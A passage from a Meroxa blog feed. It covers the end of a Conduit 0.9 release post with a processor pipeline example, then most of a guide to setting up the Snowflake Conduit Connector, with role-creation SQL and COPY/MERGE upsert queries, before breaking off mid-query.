&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.0
pipelines:
  - id: gen-to-file
    status: running
    description: &quot;A demo pipeline with two built-in processors&quot;
    connectors:
      - id: source-generator
        type: source
        plugin: builtin:generator
        name: gen-source
        settings:
          recordCount: &apos;3&apos;
          format.type: structured
          format.options: id:int,name:string,addr:string,zip:string
      - id: log
        type: destination
        plugin: builtin:log
    processors:
      - id: remove-zip
        plugin: builtin:field.exclude
        settings:
          fields: &quot;.Payload.After.zip&quot;
      - id: metadata-processed
        plugin: builtin:field.set
        settings:
          field: .Metadata.processed
          value: &quot;true&quot;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When we run the pipeline and check the Conduit logs, there are three records printed. Our generator is creating records with &lt;code class=&quot;language-text&quot;&gt;id&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;name&lt;/code&gt;, &lt;code class=&quot;language-text&quot;&gt;addr&lt;/code&gt;, and &lt;code class=&quot;language-text&quot;&gt;zip&lt;/code&gt; fields, but at the end of our pipeline, you can see that the record doesn’t have the &lt;code class=&quot;language-text&quot;&gt;.Payload.After.zip&lt;/code&gt; field. Additionally, there’s now a &lt;code class=&quot;language-text&quot;&gt;processed&lt;/code&gt; field in the &lt;code class=&quot;language-text&quot;&gt;.Metadata&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;{
  &quot;key&quot;: &quot;ZGIwYzBlMTQtMDY4Yy00MTQ3LWExOWUtYjBmMGYwMjc1OWUy&quot;,
  &quot;metadata&quot;: {
    &quot;conduit.source.connector.id&quot;: &quot;gen-to-file:source-generator&quot;,
    &quot;opencdc.readAt&quot;: &quot;1711053477220315000&quot;,
    &quot;opencdc.version&quot;: &quot;v1&quot;,
    &quot;processed&quot;: &quot;true&quot;
  },
  &quot;operation&quot;: &quot;create&quot;,
  &quot;payload&quot;: {
    &quot;after&quot;: {
      &quot;addr&quot;: &quot;string 6932464d-d940-4e27-8139-f0175289fd24&quot;,
      &quot;id&quot;: 843620792,
      &quot;name&quot;: &quot;string 549efa80-62f4-465d-9399-0129607fa40f&quot;
    },
    &quot;before&quot;: null
  },
  &quot;position&quot;: &quot;MzYzY2RlZTItZTlmNi00NWE4LWE2MDUtOGE0MGU5M2U1YmVk&quot;
}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Just by themselves, our built-in processors provide a powerful set of primitives you can use to create sophisticated data processing pipelines.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Get Started with Conduit 0.9&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We invite you to experience the advancements in Conduit 0.9 firsthand. Our &lt;a href=&quot;https://conduit.io/docs/introduction/getting-started/&quot;&gt;getting started guide&lt;/a&gt; makes it easy to set up Conduit on your machine, allowing you to explore the new processor capabilities and more.&lt;/p&gt;
&lt;h3&gt;We Value Your Feedback&lt;/h3&gt;
&lt;p&gt;The new standalone processor support in Conduit 0.9 represents a major step forward in our commitment to improving data processing ergonomics. We&apos;re eager to see the innovative ways you&apos;ll utilize these capabilities.&lt;/p&gt;
&lt;p&gt;Your feedback is crucial to us. Whether it&apos;s through posting issues, sharing thoughts in discussions, or connecting with us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;, we&apos;re all ears.&lt;/p&gt;
&lt;p&gt;For a comprehensive overview of all the new features and improvements, don&apos;t forget to check out the full release notes on the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.9.0&quot;&gt;Conduit Changelog&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Streamlining Your Analytics: Building an Efficient Snowflake Data Pipeline for Upserts and Deletes]]></title><description><![CDATA[Discover the new Snowflake Conduit Connector, your solution for real-time data management challenges in Snowflake. This comprehensive guide covers everything from setup to performance insights, equipping you to implement real-time upserts and deletes seamlessly. Enhance your Snowflake experience with this essential tool for advanced data operations.]]></description><link>https://meroxa.com/blog/streamlining-your-analytics-building-an-efficient-snowflake-data-pipeline-for-upserts-and-deletes</link><guid isPermaLink="false">https://meroxa.com/blog/streamlining-your-analytics-building-an-efficient-snowflake-data-pipeline-for-upserts-and-deletes</guid><dc:creator><![CDATA[Anna Khachaturova]]></dc:creator><pubDate>Thu, 21 Mar 2024 22:57:47 GMT</pubDate><content:encoded>&lt;p&gt;Snowflake&apos;s rise to prominence in data-driven companies is undeniable, yet many users encounter a common bottleneck: the challenge of real-time data ingestion, particularly when it comes to upserts and deletes. Snowflake&apos;s native data ingest services, such as Snowpipe and Snowpipe Streaming, fall short of offering these crucial capabilities directly. This is where the innovative Snowflake Conduit Connector steps in, bridging this critical gap by enabling safe and real-time upserts or marking records for deletion in Snowflake. This article takes a closer look at the development journey of the Snowflake Conduit Connector, offers a guide on setting it up, evaluates its data stream performance, and previews future enhancements.&lt;/p&gt;
&lt;h2&gt;Key Points&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Performance of the Snowflake Conduit Connector&lt;/li&gt;
&lt;li&gt;Covering the gap of features that Snowflake doesn&apos;t offer&lt;/li&gt;
&lt;li&gt;How easy it is to deploy the connector&lt;/li&gt;
&lt;li&gt;Our journey building this connector&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Filling the Feature Gap with Snowflake Conduit Connector&lt;/h3&gt;
&lt;p&gt;Snowflake&apos;s architecture revolutionized data warehousing with its cloud-native approach, but its real-time data manipulation capabilities needed a boost. The Snowflake Conduit Connector is designed to extend Snowflake&apos;s functionality, allowing for real-time data upserts and deletions, features eagerly awaited by many Snowflake users. This connector not only enhances Snowflake&apos;s capabilities but also ensures data integrity and timely data updates, critical for operational and analytical workloads.&lt;/p&gt;
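&lt;p&gt;To make this concrete, here is a sketch of what such a pipeline configuration could look like. Note that the plugin names, settings, and connection strings below are illustrative assumptions, not the connector’s actual configuration; consult the connector’s README for the real options:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;text&quot;&gt;&lt;pre class=&quot;language-text&quot;&gt;&lt;code class=&quot;language-text&quot;&gt;version: 2.2
pipelines:
  - id: postgres-to-snowflake
    status: running
    connectors:
      - id: pg-source
        type: source
        plugin: builtin:postgres # CDC source emitting creates, updates, and deletes
        settings:
          url: postgres://user:password@localhost:5432/mydb # hypothetical connection string
          tables: orders
      - id: snowflake-dest
        type: destination
        plugin: standalone:snowflake # hypothetical plugin name for the Snowflake Conduit Connector
        settings:
          # fill in your Snowflake account, warehouse, database, and table
          # per the connector README
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;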
&lt;h3&gt;&lt;strong&gt;Setting Up the Snowflake Conduit Connector: A Step-by-Step Guide&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Snowflake Conduit Connector empowers users to seamlessly integrate real-time data upserts and deletes into their Snowflake data warehouse. This guide provides a comprehensive walkthrough for setting up the Snowflake Conduit Connector, ensuring you can quickly leverage its capabilities to enhance your data management processes.&lt;/p&gt;
&lt;h3&gt;Step 1: Prerequisites&lt;/h3&gt;
&lt;p&gt;Before starting the setup process, ensure you have:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;An active Snowflake account with administrative privileges.&lt;/li&gt;
&lt;li&gt;Conduit installed locally&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Step 2: Configuring Snowflake for the Conduit Connector&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Create a Role and User for Conduit:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Log into your Snowflake account.&lt;/li&gt;
&lt;li&gt;Execute SQL commands to create a dedicated role and user for Conduit, granting the necessary permissions for reading, writing, and managing data.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;CREATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USER&lt;/span&gt; conduit_connector_user PASSWORD &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;&amp;lt;strong_password&gt;&apos;&lt;/span&gt; DEFAULT_ROLE &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; ROLE conduit_connector_role &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USER&lt;/span&gt; conduit_connector_user&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Assign Permissions:&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Assign permissions to the Conduit connector role to access the specific database and tables where upserts and deletes will be performed.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USAGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DATABASE&lt;/span&gt; my_database &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;USAGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SCHEMA&lt;/span&gt; my_database&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;my_schema &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token keyword&quot;&gt;GRANT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SELECT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;UPDATE&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;DELETE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;ALL&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;TABLES&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;IN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SCHEMA&lt;/span&gt; my_database&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;my_schema &lt;span class=&quot;token keyword&quot;&gt;TO&lt;/span&gt; ROLE conduit_connector_role&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h3&gt;Step 3: Setting Up the Conduit Connector&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Log into Conduit:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Access your Conduit dashboard using your credentials.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/3dfeceea39ed5b847b2bea99ed2d3aca/4abbf/access-conduit-dashboard.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 59.00000000000001%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABE0lEQVR42uWTO04DMRCGfVNAkAaJhygoaMIJaCgpuAdcgAtkvV4USIMIr334sfZ6iX7sAYeICIRIiaVPHv0e/zOWxuzk9AxxOdeh6zxhrYNSBs5+aosk3bQWj1WNRht435PG9g+H6F9naKSG0i20CUlPJbgYY/rwDBk0GcwTMaesGxhtcXs/xfnlBa44R+c8nbONwR6C39wwIqVBWckQG7ShWxu6T9SNoqLOhw5NLKbnhSJsfWt3yTDGL2VNcXzWIrGINu963NOdHw3VxzO/Jv+Gbw3/yn80XNvcge9nqGpJI7EqbLB9QD9FxVEIM9eGX7AK7Oh4iMnkDqK4QS6ukY04OC8ozkVBZDwnRtkySc+4IN4AFTyE+UautJcAAAAASUVORK5CYII=&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Screenshot of the Conduit Dashboard showing Pipelines&quot;
        title=&quot;&quot;
        src=&quot;/static/3dfeceea39ed5b847b2bea99ed2d3aca/5a190/access-conduit-dashboard.png&quot;
        srcset=&quot;/static/3dfeceea39ed5b847b2bea99ed2d3aca/772e8/access-conduit-dashboard.png 200w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/e17e5/access-conduit-dashboard.png 400w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/5a190/access-conduit-dashboard.png 800w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/c1b63/access-conduit-dashboard.png 1200w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/29007/access-conduit-dashboard.png 1600w,
/static/3dfeceea39ed5b847b2bea99ed2d3aca/4abbf/access-conduit-dashboard.png 3088w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Create a New Connector:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Navigate to the &quot;Connectors&quot; section and click &quot;Create Connector.&quot;&lt;/li&gt;
&lt;li&gt;Select &quot;&lt;a href=&quot;https://meroxa.com/connectors/source/snowflake/&quot;&gt;Snowflake&lt;/a&gt;&quot; as the connector type.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Configure Connector Settings:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fill in the connection details for your Snowflake instance, including account name, user, password, and any specific configurations related to your setup.&lt;/li&gt;
&lt;li&gt;Specify the database and schema where the connector should perform creates, upserts, and deletes.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Map Data Streams:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Define the data streams that the connector will manage. Specify the source data and how it maps to the target tables in Snowflake.&lt;/li&gt;
&lt;li&gt;Configure the upsert and delete operations by defining the key columns and conditions.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Step 4: Launching the Connector&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Review and Save:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Review all settings to ensure they are correct.&lt;/li&gt;
&lt;li&gt;Save the connector configuration.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Activate Connector:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Once the connector is configured, activate it to start processing data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 800px; &quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/a9cc15886f0fc21848e2e8fa7cd728fa/db806/activate-connector.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 53%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAIAAADwazoUAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAklEQVR42tWRX0+DMBTF+f5fyGQ6MMM9+IITGJQ/g+HcwkDAAG1ZQtHDmhCMxvhq80tze3rOzW2qFGXFGBdCfPx5DcPQ9z12JU0zzjshcBaU8qahTUsp44x3YFRaKAwFY52kpbwoyrpuxzDaoF/d0t3+NcvLNCtssjMsz7CIHyXnvEizN8eLnm3P3PrAcvytG9pOoFTVu5wZw/th8nI4AdsNYN1YhARxclXgnsIANVAopfIlGB6qYbpPJpl8KHCcK3O+hC0n+O74hf8bZjLcXS5emDhe7PqxG+wl5CcmXYnwk+f8eDxFcayvH5fag3q/vlN1cKuu5khlvNL0xXJ1s9A+ARmTRJ6hhWXmAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Screenshot of the conduit dashboard showing the connector page with an open dropdown showing the &amp;quot;Start Pipeline&amp;quot; button&quot;
        title=&quot;&quot;
        src=&quot;/static/a9cc15886f0fc21848e2e8fa7cd728fa/5a190/activate-connector.png&quot;
        srcset=&quot;/static/a9cc15886f0fc21848e2e8fa7cd728fa/772e8/activate-connector.png 200w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/e17e5/activate-connector.png 400w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/5a190/activate-connector.png 800w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/c1b63/activate-connector.png 1200w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/29007/activate-connector.png 1600w,
/static/a9cc15886f0fc21848e2e8fa7cd728fa/db806/activate-connector.png 3424w&quot;
        sizes=&quot;(max-width: 800px) 100vw, 800px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
        decoding=&quot;async&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Monitor the connector&apos;s performance and logs through the Conduit dashboard.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Step 5: Monitoring and Maintenance&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;Regularly check the connector&apos;s logs for any errors or performance issues.&lt;/li&gt;
&lt;li&gt;Adjust configurations as necessary to optimize data processing.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Performance Insights: Streamlining Your Data Flow&lt;/h3&gt;
&lt;p&gt;One of the core advantages of the Snowflake Conduit Connector is its performance in handling data streams. Our development efforts were centered on ensuring the connector could manage high volumes of data with minimal latency, making real-time data ingestion, upserts, and deletes a reality. Here, we delve into performance metrics, showcasing the efficiency and reliability of the connector in various scenarios and highlighting how it stands up to the demands of modern data-driven operations.&lt;/p&gt;
&lt;h3&gt;Our Development Journey: Challenges and Victories&lt;/h3&gt;
&lt;p&gt;Developing the Snowflake Conduit Connector was a journey marked by both challenges and breakthroughs. From conceptualization to launch, our team navigated through intricate technical hurdles, all while keeping the user&apos;s needs at the forefront. Along the way, we also discovered that other platforms produced results with missing data.&lt;/p&gt;
&lt;p&gt;One of the main issues we encountered during development: since Snowflake provides no direct way of doing upserts, we had to bench-test our own workarounds for uploading data. We made several attempts:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Uploading data via csv file to Snowflake, copying data from csv into temporary table, then merging it into final.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Uploading data via Avro file to Snowflake, copying data from Avro file into temp table, and then merging into final.&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Sample Copy and Merge Query:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;COPY &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; mytable_temp &lt;span class=&quot;token keyword&quot;&gt;FROM&lt;/span&gt; &lt;span class=&quot;token variable&quot;&gt;@mystage&lt;/span&gt; FILES &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&apos;myfile.avro.gz&apos;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
			 FILE_FORMAT &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;TYPE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; avro&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; MATCH_BY_COLUMN_NAME &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; CASE_INSENSITIVE &lt;span class=&quot;token keyword&quot;&gt;PURGE&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;TRUE&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
			 
&lt;span class=&quot;token keyword&quot;&gt;MERGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; mytable_final &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; a &lt;span class=&quot;token keyword&quot;&gt;USING&lt;/span&gt; mytable_temp &lt;span class=&quot;token keyword&quot;&gt;AS&lt;/span&gt; b &lt;span class=&quot;token keyword&quot;&gt;ON&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;id
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;UPDATE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;SET&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at
			&lt;span class=&quot;token keyword&quot;&gt;WHEN&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;NOT&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;MATCHED&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;AND&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;create&apos;&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;OR&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&apos;snapshot&apos;&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;THEN&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INSERT&lt;/span&gt;  &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; a&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;VALUES&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;b&lt;span class=&quot;token 
punctuation&quot;&gt;.&lt;/span&gt;meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; b&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;data&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Both approaches above proved to be too slow, so we ended up going with a third: uploading the data in CSV format and merging it from the CSV file directly into the final table.&lt;/p&gt;
&lt;p&gt;Sample Merge Query On New Records:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;sql&quot;&gt;&lt;pre class=&quot;language-sql&quot;&gt;&lt;code class=&quot;language-sql&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;MERGE&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;INTO&lt;/span&gt; my_table &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; a &lt;span class=&quot;token keyword&quot;&gt;USING&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;select&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt; meroxa_operation&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt; meroxa_created_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;3&lt;/span&gt; meroxa_updated_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token number&quot;&gt;4&lt;/span&gt; meroxa_deleted_at&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; $&lt;span class=&quot;token 